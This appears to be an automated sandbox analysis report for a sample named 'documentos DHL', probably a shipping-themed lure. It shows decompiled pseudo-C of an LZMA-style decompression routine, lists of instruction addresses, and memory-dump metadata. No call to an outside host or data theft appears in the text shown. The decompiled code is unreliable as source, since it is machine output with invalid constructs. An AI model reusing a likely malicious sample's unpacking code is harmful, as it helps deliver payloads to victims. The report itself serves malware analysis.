													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406e77
0x00406e77
0x00406e7b
0x00406e88
0x00406e92
0x00000000
0x00406e7d
0x00406e7d
0x00406eb8
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec1
0x00406ec4
0x00406ecb
0x00406ed0
0x00406db1
0x00406db4
0x00407126
0x00407126
0x00407126
0x00407129
0x00407129
0x00407129
0x0040712f
0x00407135
0x0040713b
0x00407155
0x00407158
0x0040715e
0x00407169
0x0040716b
0x0040713d
0x0040713d
0x0040714c
0x00407150
0x00407150
0x00407175
0x00000000
0x00000000
0x00407177
0x0040717b
0x0040732a
0x00407340
0x00407348
0x0040734f
0x00407351
0x00407358
0x0040735c
0x0040735c
0x00407187
0x0040718e
0x00407196
0x00407199
0x0040719c
0x0040719c
0x004071a2
0x004071a2
0x0040693e
0x0040693e
0x0040693e
0x00406947
0x00000000
0x00000000
0x0040694d
0x00000000
0x00406958
0x00000000
0x00000000
0x00406961
0x00406964
0x00406967
0x0040696b
0x00000000
0x00000000
0x00406971
0x00406974
0x00406976
0x00406977
0x0040697a
0x0040697c
0x0040697d
0x0040697f
0x00406982
0x00406987
0x0040698c
0x00406995
0x004069a8
0x004069ab
0x004069b7
0x004069df
0x004069e1
0x004069ef
0x004069ef
0x004069f3
0x00000000
0x00000000
0x00000000
0x00000000
0x004069e3
0x004069e3
0x004069e6
0x004069e7
0x004069e7
0x00000000
0x004069e3
0x004069bd
0x004069c2
0x004069c2
0x004069cb
0x004069d3
0x004069d6
0x00000000
0x004069dc
0x004069dc
0x00000000
0x004069dc
0x00000000
0x004069f9
0x004069f9
0x004069fd
0x004072a9
0x00000000
0x004072a9
0x00406a06
0x00406a16
0x00406a19
0x00406a1c
0x00406a1c
0x00406a1c
0x00406a1f
0x00406a23
0x00000000
0x00000000
0x00406a25
0x00406a2b
0x00406a55
0x00406a5b
0x00406a62
0x00000000
0x00406a62
0x00406a31
0x00406a34
0x00406a39
0x00406a39
0x00406a44
0x00406a4c
0x00406a4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a94
0x00406a9a
0x00406a9d
0x00406aaa
0x00406ab2
0x00407126
0x00407126
0x00000000
0x00000000
0x00406a69
0x00406a69
0x00406a6d
0x004072b8
0x00000000
0x004072b8
0x00406a79
0x00406a84
0x00406a84
0x00406a84
0x00406a87
0x00406a8a
0x00406a8d
0x00406a92
0x00000000
0x00000000
0x00000000
0x00000000
0x00407129
0x00407129
0x0040712f
0x00407135
0x0040713b
0x00407155
0x00407158
0x0040715e
0x00407169
0x0040716b
0x0040713d
0x0040713d
0x0040714c
0x00407150
0x00407150
0x00407175
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406aba
0x00406abc
0x00406abf
0x00406b30
0x00406b33
0x00406b36
0x00406b3d
0x00406b47
0x00407126
0x00407126
0x00407126
0x00000000
0x00407126
0x00407126
0x00406ac1
0x00406ac5
0x00406ac8
0x00406aca
0x00406acd
0x00406ad0
0x00406ad2
0x00406ad5
0x00406ad7
0x00406adc
0x00406adf
0x00406ae2
0x00406ae6
0x00406aed
0x00406af0
0x00406af7
0x00406afb
0x00406b03
0x00406b03
0x00406b03
0x00406afd
0x00406afd
0x00406afd
0x00406af2
0x00406af2
0x00406af2
0x00406b07
0x00406b0a
0x00406b28
0x00406b2a
0x00000000
0x00406b0c
0x00406b0c
0x00406b0f
0x00406b12
0x00406b15
0x00406b17
0x00406b17
0x00406b17
0x00406b1a
0x00406b1d
0x00406b1f
0x00406b20
0x00406b23
0x00000000
0x00406b23
0x00000000
0x00406d59
0x00406d5d
0x00406d7b
0x00406d7e
0x00406d85
0x00406d88
0x00406d8b
0x00406d8e
0x00406d91
0x00406d94
0x00406d96
0x00406d9d
0x00406d9e
0x00406da0
0x00406da3
0x00406da6
0x00406da9
0x00406da9
0x00406dae
0x00000000
0x00406dae
0x00406d5f
0x00406d62
0x00406d65
0x00406d6f
0x00407126
0x00407126
0x00407126
0x00000000
0x00407126
0x00000000
0x00406dc3
0x00406dc7
0x00406dea
0x00406ded
0x00406df0
0x00406dfa
0x00406dc9
0x00406dc9
0x00406dcc
0x00406dcf
0x00406dd2
0x00406ddf
0x00406de2
0x00406de2
0x00407126
0x00407126
0x00407126
0x00000000
0x00407126
0x00000000
0x00406e06
0x00406e0a
0x00000000
0x00000000
0x00406e10
0x00406e14
0x00000000
0x00000000
0x00406e1a
0x00406e1c
0x00406e20
0x00406e20
0x00406e23
0x00406e27
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e9e
0x00406ea2
0x00406ea9
0x00406eac
0x00406eaf
0x00406ea4
0x00406ea4
0x00406ea4
0x00406eb2
0x00406eb5
0x00000000
0x00000000
0x00406f5e
0x00406f5e
0x00406f62
0x00407300
0x00000000
0x00407300
0x00406f68
0x00406f6b
0x00406f6e
0x00406f72
0x00406f75
0x00406f7b
0x00406f7d
0x00406f7d
0x00406f7d
0x00406f80
0x00406f83
0x00000000
0x00000000
0x00406b53
0x00406b53
0x00406b57
0x004072c4
0x00000000
0x004072c4
0x00406b5d
0x00406b60
0x00406b63
0x00406b67
0x00406b6a
0x00406b70
0x00406b72
0x00406b72
0x00406b72
0x00406b75
0x00406b78
0x00406b78
0x00406b7b
0x00406b7e
0x00000000
0x00000000
0x00406b84
0x00406b8a
0x00000000
0x00000000
0x00406b90
0x00406b90
0x00406b94
0x00406b97
0x00406b9a
0x00406b9d
0x00406ba0
0x00406ba1
0x00406ba4
0x00406ba6
0x00406bac
0x00406baf
0x00406bb2
0x00406bb5
0x00406bb8
0x00406bbb
0x00406bbe
0x00406bda
0x00406bdd
0x00406be0
0x00406be3
0x00406bea
0x00406bee
0x00406bf0
0x00406bf4
0x00406bc0
0x00406bc0
0x00406bc4
0x00406bcc
0x00406bd1
0x00406bd3
0x00406bd5
0x00406bd5
0x00406bf7
0x00406bfe
0x00406c01
0x00000000
0x00406c07
0x00000000
0x00406c07
0x00000000
0x00406c0c
0x00406c0c
0x00406c10
0x004072d0
0x00000000
0x004072d0
0x00406c16
0x00406c19
0x00406c1c
0x00406c20
0x00406c23
0x00406c29
0x00406c2b
0x00406c2b
0x00406c2b
0x00406c2e
0x00406c31
0x00406c31
0x00406c31
0x00406c37
0x00000000
0x00000000
0x00406c39
0x00406c3c
0x00406c3f
0x00406c42
0x00406c45
0x00406c48
0x00406c4b
0x00406c4e
0x00406c51
0x00406c54
0x00406c57
0x00406c6f
0x00406c72
0x00406c75
0x00406c78
0x00406c78
0x00406c7b
0x00406c7f
0x00406c81
0x00406c59
0x00406c59
0x00406c61
0x00406c66
0x00406c68
0x00406c6a
0x00406c6a
0x00406c84
0x00406c8b
0x00406c8e
0x00000000
0x00406c90
0x00000000
0x00406c90
0x00406c8e
0x00406c95
0x00406c95
0x00406c95
0x00406c95
0x00000000
0x00000000
0x00406cd0
0x00406cd0
0x00406cd4
0x004072dc
0x00000000
0x004072dc
0x00406cda
0x00406cdd
0x00406ce0
0x00406ce4
0x00406ce7
0x00406ced
0x00406cef
0x00406cef
0x00406cef
0x00406cf2
0x00406cf5
0x00406cf5
0x00406cfb
0x00406c99
0x00406c99
0x00406c9c
0x00000000
0x00406c9c
0x00406cfd
0x00406cfd
0x00406d00
0x00406d03
0x00406d06
0x00406d09
0x00406d0c
0x00406d0f
0x00406d12
0x00406d15
0x00406d18
0x00406d1b
0x00406d33
0x00406d36
0x00406d39
0x00406d3c
0x00406d3c
0x00406d3f
0x00406d43
0x00406d45
0x00406d1d
0x00406d1d
0x00406d25
0x00406d2a
0x00406d2c
0x00406d2e
0x00406d2e
0x00406d48
0x00406d4f
0x00406d52
0x00000000
0x00406d54
0x00000000
0x00406d54
0x00000000
0x00406fe1
0x00406fe1
0x00406fe5
0x0040730c
0x00000000
0x0040730c
0x00406feb
0x00406fee
0x00406ff1
0x00406ff5
0x00406ff8
0x00406ffe
0x00407000
0x00407000
0x00407000
0x00407003
0x00000000
0x00000000
0x00000000
0x00000000
0x004070f0
0x004070f4
0x00407116
0x00407119
0x00407123
0x00407126
0x00407126
0x00407126
0x00000000
0x00407126
0x00407126
0x004070f6
0x004070f9
0x004070fd
0x00407100
0x00407100
0x00407103
0x00000000
0x00000000
0x004071ad
0x004071b1
0x004071cf
0x004071cf
0x004071cf
0x004071d6
0x004071dd
0x004071e4
0x004071e4
0x00000000
0x004071e4
0x004071b3
0x004071b6
0x004071b9
0x004071bc
0x004071c3
0x00407107
0x00407107
0x0040710a
0x00000000
0x00000000
0x0040729e
0x004072a1
0x004071a2
0x00000000
0x00000000
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00000000
0x00000000
0x00406eef
0x00406ef2
0x00406ef5
0x00406ef7
0x00406ef9
0x00406ef9
0x00406efa
0x00406efd
0x00406f04
0x00406f07
0x00406f15
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071ee
0x004071f5
0x00000000
0x00000000
0x004071fa
0x004071fa
0x004071fe
0x00407336
0x00000000
0x00407336
0x00407204
0x00407207
0x0040720a
0x0040720e
0x00407211
0x00407217
0x00407219
0x00407219
0x00407219
0x0040721c
0x0040721f
0x0040721f
0x0040721f
0x0040721f
0x00407222
0x00407222
0x00407226
0x00407286
0x00407289
0x0040728e
0x0040728f
0x00407291
0x00407293
0x00407296
0x004071a2
0x004071a2
0x00000000
0x004071a8
0x004071a2
0x00407228
0x0040722e
0x00407231
0x00407234
0x00407237
0x0040723a
0x0040723d
0x00407240
0x00407243
0x00407246
0x00407249
0x00407262
0x00407265
0x00407268
0x0040726b
0x0040726f
0x00407271
0x00407271
0x00407272
0x00407275
0x0040724b
0x0040724b
0x00407253
0x00407258
0x0040725a
0x0040725d
0x0040725d
0x00407278
0x0040727f
0x00000000
0x00407281
0x00000000
0x00407281
0x00000000
0x00406f1d
0x00406f20
0x00406f56
0x00407086
0x00407086
0x00407086
0x00407086
0x00407089
0x00407089
0x0040708c
0x0040708e
0x00407318
0x00000000
0x00407318
0x00407094
0x00407097
0x00000000
0x00000000
0x0040709d
0x004070a1
0x004070a4
0x004070a4
0x004070a4
0x00000000
0x004070a4
0x00406f22
0x00406f24
0x00406f26
0x00406f28
0x00406f2b
0x00406f2c
0x00406f2e
0x00406f30
0x00406f33
0x00406f36
0x00406f4c
0x00406f51
0x00406f89
0x00406f89
0x00406f8d
0x00406fb9
0x00406fbb
0x00406fc2
0x00406fc5
0x00406fc8
0x00406fc8
0x00406fcd
0x00406fcd
0x00406fcf
0x00406fd2
0x00406fd9
0x00406fdc
0x00407009
0x00407009
0x0040700c
0x0040700f
0x00407083
0x00407083
0x00407083
0x00000000
0x00407083
0x00407011
0x00407017
0x0040701a
0x0040701d
0x00407020
0x00407023
0x00407026
0x00407029
0x0040702c
0x0040702f
0x00407032
0x0040704b
0x0040704d
0x00407050
0x00407051
0x00407054
0x00407056
0x00407059
0x0040705b
0x0040705d
0x00407060
0x00407062
0x00407065
0x00407069
0x0040706b
0x0040706b
0x0040706c
0x0040706f
0x00407072
0x00407034
0x00407034
0x0040703c
0x00407041
0x00407043
0x00407046
0x00407046
0x00407075
0x0040707c
0x00407006
0x00407006
0x00407006
0x00407006
0x00000000
0x0040707e
0x00000000
0x0040707e
0x0040707c
0x00406f8f
0x00406f92
0x00406f94
0x00406f97
0x00406f9a
0x00406f9d
0x00406f9f
0x00406fa2
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fa8
0x00406fab
0x00406fb2
0x00406f86
0x00406f86
0x00406f86
0x00406f86
0x00000000
0x00406fb4
0x00000000
0x00406fb4
0x00406fb2
0x00406f38
0x00406f3b
0x00406f3d
0x00406f40
0x00000000
0x00000000
0x00406c9f
0x00406c9f
0x00406ca3
0x004072e8
0x00000000
0x004072e8
0x00406ca9
0x00406cac
0x00406caf
0x00406cb2
0x00406cb5
0x00406cb8
0x00406cbb
0x00406cbd
0x00406cc0
0x00406cc3
0x00406cc6
0x00406cc8
0x00406cc8
0x00406cc8
0x00000000
0x00000000
0x00406e2a
0x00406e2a
0x00406e2e
0x004072f4
0x00000000
0x004072f4
0x00406e34
0x00406e37
0x00406e3a
0x00406e3d
0x00406e3f
0x00406e3f
0x00406e3f
0x00406e42
0x00406e45
0x00406e48
0x00406e4b
0x00406e4e
0x00406e51
0x00406e52
0x00406e54
0x00406e54
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e60
0x00406e60
0x00406e63
0x00406e65
0x00406e65
0x00000000
0x00000000
0x004070a7
0x004070a7
0x004070a7
0x004070ab
0x00000000
0x00000000
0x004070b1
0x004070b4
0x004070b7
0x004070ba
0x004070bc
0x004070bc
0x004070bc
0x004070bf
0x004070c2
0x004070c5
0x004070c8
0x004070cb
0x004070ce
0x004070cf
0x004070d1
0x004070d1
0x004070d1
0x004070d4
0x004070d7
0x004070da
0x004070dd
0x004070e0
0x004070e4
0x004070e6
0x004070e9
0x00000000
0x004070eb
0x00406e68
0x00406e68
0x00000000
0x00406e68
0x004070e9
0x0040731e
0x00000000
0x00000000
0x0040694d
0x00407355
0x00407355
0x00000000
0x00407355
0x004071a2
0x00407129
0x00407126
0x00000000
0x00406e7b

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
Instruction ID: 968097f9e37e498ed83c4652799cdf8e1ebeb5c7fee57b8dc09d96684c556b9e
Opcode Fuzzy Hash: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
Instruction Fuzzy Hash: 27712471E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786996DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406DC3() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M0040735D))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
